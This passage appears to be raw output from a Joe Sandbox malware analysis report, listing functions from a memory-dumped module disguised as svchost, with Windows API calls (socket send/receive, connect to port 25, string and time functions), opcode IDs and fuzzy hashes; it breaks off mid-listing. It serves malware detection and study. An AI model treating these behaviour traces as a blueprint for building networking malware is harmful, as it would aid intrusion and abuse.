                                                                                                                                                                                                                                                          • Instruction ID: ee50b3158d8374e2205bbdc78726c599e77e4a5b8b3f5f2d8e843d41d0ff5688
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7B191B5A00306EFDB14CFA8CC91E6EBBB9FF18304F244569E956AB691D730E911CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(1314DA5B,-00000004,00000042,-00000004,0000007A,00000000,1314E1F1,00000000,1314E1F5), ref: 1314D376
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcmp
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1534048567-0
                                                                                                                                                                                                                                                          • Opcode ID: 4a61bf6aa6ca18f9759d97f1bb058023532ad13992efc2a450b306a7af534a25
                                                                                                                                                                                                                                                          • Instruction ID: 6cabc15ffc21ca0ef62386b654588a5c7bc9dc68298394349ababf14b398281b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a61bf6aa6ca18f9759d97f1bb058023532ad13992efc2a450b306a7af534a25
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B61D1B5A00326ABDF01DFE8CC81DEEB779EF41658F680425F505A7641EB74E940CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463B5
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463CF
                                                                                                                                                                                                                                                          • sendto.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463F7
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 13146401
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13146413
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$ExitProcessSleepsendto
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1614787347-0
                                                                                                                                                                                                                                                          • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                                                                                          • Instruction ID: f9d9d312b63715cea87f7def494aa1476285842a4910d48bf0ac6b79b102a875
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4421F2B29403A8AFDB20EFE48DC0E9A732CAB05758F150934F61A67185E774AE448B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511FA,00000008,?,1314DF75,76132640,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEE
                                                                                                                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,1314DF75,76132640,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAFF
                                                                                                                                                                                                                                                          • shutdown.WS2_32(00000000,00000002), ref: 1314EB0A
                                                                                                                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000002,00000000,?,1314DF75,76132640,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EB0F
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314EB18
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$Readclosesocketshutdown
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4241232737-0
                                                                                                                                                                                                                                                          • Opcode ID: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                                                                                          • Instruction ID: 64597dc8f14b545119c056b7161341aca8f44151334267f50d9d632a3386f452
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F06235601240ABCB225F1DDC89D0A77E9EFC3B01B680939F8D8AB214DB31A881CB71
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • send.WS2_32(1314E1A7,?,00000000,13143425), ref: 1314DB5E
                                                                                                                                                                                                                                                          • recv.WS2_32(00000008,?,00000000,00020000), ref: 1314DBAD
                                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000000,?), ref: 1314DC07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: recv$send
                                                                                                                                                                                                                                                          • String ID: OzB
                                                                                                                                                                                                                                                          • API String ID: 1963230611-3380978223
                                                                                                                                                                                                                                                          • Opcode ID: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                                                                                          • Instruction ID: a6d8a547d4d7dba041dffb0585ee0a10fe1e84b7311ab2876e372012bd6c3884
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1741DD3A604215AFDF16EBA8CC95DAE7779FF42610B64493CF422A3190EF70BA44CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530,76132640,00000000,00000000), ref: 1314D8B6
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505F9,?,00000000,00000000), ref: 13144C42
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C56
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C6B
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(1314E202,?,?,?,?,?,00000000), ref: 1314D645
                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(00000000), ref: 1314D730
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 1314D756
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$CriticalEnterFreeHeapSectionSleepinet_ntoalstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3707610853-0
                                                                                                                                                                                                                                                          • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                                                                                          • Instruction ID: 85804d81a0b3f996cc8e3f993ce6150457bfc5b8273e19742008c52d7d2c31f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CA109B5A00265AFEB08EF58C9D0C6577F9FB0524C7688439E945D7316EB34E981CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CharLowerA.USER32(00000000,131616E8,?,00000000), ref: 1314E8B5
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,?,-00000004,00000060,?,00000000,-00000004,0000005F,?,00000000,-00000004,0000005E,?,00000000,-00000004,0000005D), ref: 1314E9D5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CharLower
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1615517891-0
                                                                                                                                                                                                                                                          • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                                                                                          • Instruction ID: 55354aba79ba1874cd0fbe84286657b3d5da400f78d1ff2b94a4c4cac87821d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E518076A04605EFDB21CF98C980E9AB7F9FF08314F284429E65AE7290D730F950DB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF1D
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFDC
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFFE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 1314B002
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2274183309-0
                                                                                                                                                                                                                                                          • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                                                                                          • Instruction ID: a74685481d463179f19788f7fab92f1dad1b175aa3379debd9faf6d6e193eef0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 343150B6A00219AFDB00DFA9CDC09AFB7F9FF48644B558479E556E3200E730EA41CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000,761311A0), ref: 13151258
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 13151277
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512B4
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000008), ref: 13151333
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entersetsockopt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2622634160-0
                                                                                                                                                                                                                                                          • Opcode ID: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                                                                                          • Instruction ID: eeaae9abf41def517d93f69b57e648ada73d6bba23f07fd8ba6a5e794752873d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D3116B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A544CF10
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314BD2F
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(1314CF5F,0000FFFF,00001005,?,00000004), ref: 1314BD78
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(1314CF5F,0000FFFF,00001006,?,00000004), ref: 1314BD8B
                                                                                                                                                                                                                                                          • connect.WS2_32(1314CF5F,00000002,00000010), ref: 1314BD98
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: setsockopt$connecthtons
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3400676187-0
                                                                                                                                                                                                                                                          • Opcode ID: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                                                                                          • Instruction ID: bfc2101d7bc6df8bcd8ecf80e76a602450dde5e84ff1f9cab78317e6ca9cf96a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74016979A40309BBEB11DBA8CC06EEFB7B9AF85700F100439F644AB190D7B0AA049B51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 1314737F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 13147392
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473BF
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 131473E8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3771035241-0
                                                                                                                                                                                                                                                          • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                                                                                          • Instruction ID: 22f063ee8376c6af03fe04f9f38c1742ffbcef6b8c4240f2c466d1715124cb51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C0196B29002199FEF08EFF4CC85DD93BADEB04258F114022FA15D2154DB75D5848FA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13152BFD: __amsg_exit.LIBCMT ref: 13152C0B
                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 1315433B
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 1315434B
                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 13154368
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(1315AD08), ref: 13154393
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4129207761-0
                                                                                                                                                                                                                                                          • Opcode ID: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                                                                                          • Instruction ID: 841d950e54b799b83921e5adb6aed1b0e70aea622248ec8fdb6f22e4af3ebf93
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0018E36F81731DBDB95AF6A95887897760BF03611F484115F430B7690DB386442CBD1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000000,13152F07,13152DA8,00000001,1315295F,?,00000000,00000000,?,?,?,13152A71,?,13152F22,?), ref: 13152B88
                                                                                                                                                                                                                                                            • Part of subcall function 13152A95: TlsGetValue.KERNEL32(00000000,13152B9B,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152A9C
                                                                                                                                                                                                                                                            • Part of subcall function 13152A95: TlsSetValue.KERNEL32(00000000,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152ABD
                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 13152BAA
                                                                                                                                                                                                                                                            • Part of subcall function 13152F55: __calloc_impl.LIBCMT ref: 13152F63
                                                                                                                                                                                                                                                            • Part of subcall function 13152F55: Sleep.KERNEL32(00000000), ref: 13152F7A
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                                                                                            • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                                                                                            • Part of subcall function 13152AC7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                                                                                            • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152B0C
                                                                                                                                                                                                                                                            • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B1C
                                                                                                                                                                                                                                                            • Part of subcall function 13152AC7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                                                                                            • Part of subcall function 13152AC7: __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13152BDA
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152BF2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2539975944-0
                                                                                                                                                                                                                                                          • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                                                                                          • Instruction ID: 34a35ee0a2ee0b0f73b2b1eed6102eacb8e391b11be9a5fa08b7e9cf7a66c14b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82F0C237605772ABD73A2B79AC45ECA3BA49F076B1B15452AF834E70C0CF25D4438AB0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 131524BC
                                                                                                                                                                                                                                                            • Part of subcall function 1315246D: __mtinitlocknum.LIBCMT ref: 13152481
                                                                                                                                                                                                                                                            • Part of subcall function 1315246D: __amsg_exit.LIBCMT ref: 1315248D
                                                                                                                                                                                                                                                            • Part of subcall function 1315246D: EnterCriticalSection.KERNEL32(?,?,?,131520D2,0000000E,13156938,0000000C,13151FA7), ref: 13152495
                                                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 131524C7
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,13156998,0000000C,13152BEE,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152506
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152517
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 568605419-0
                                                                                                                                                                                                                                                          • Opcode ID: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                                                                                          • Instruction ID: a14f81d0e6afd0b26f5cca17c86cd6e71ecad54a2d1094fc1621cce35ebd326f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4301DB77A01316EBDB255FB59918BCD37A8EF03366F148428F430A71C0CF34A142DA54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 131472FB
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314730E
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314733B
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 1314735E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3771035241-0
                                                                                                                                                                                                                                                          • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                                                                                          • Instruction ID: bd6bd433622d16bfb8a7ed934dcb1d9e70c68623f8fc179dd0aa0ea7f68c250e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA0162B2900229AFEF08EFF4CC85EDA3B6DEB04258F014022F915E3154DB74D9848FA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 131478E7
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074,00000000,?,?,00000000), ref: 131479A1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                                                                                          • Opcode ID: 2c14ef2d4ae874a7a58cd04810082f978d56a26be6aa824f51d98c3629217dfc
                                                                                                                                                                                                                                                          • Instruction ID: 3e9b2355841d95ef22162ce4f4d8e982ddce70f17a4da1c5c4dcb4839e4577d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c14ef2d4ae874a7a58cd04810082f978d56a26be6aa824f51d98c3629217dfc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB81E076A0438A9FDB21CF78CC90BEE3BA5AF51304F3C4069E8658B242E775D546CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414AC,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AD3
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A8,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AEC
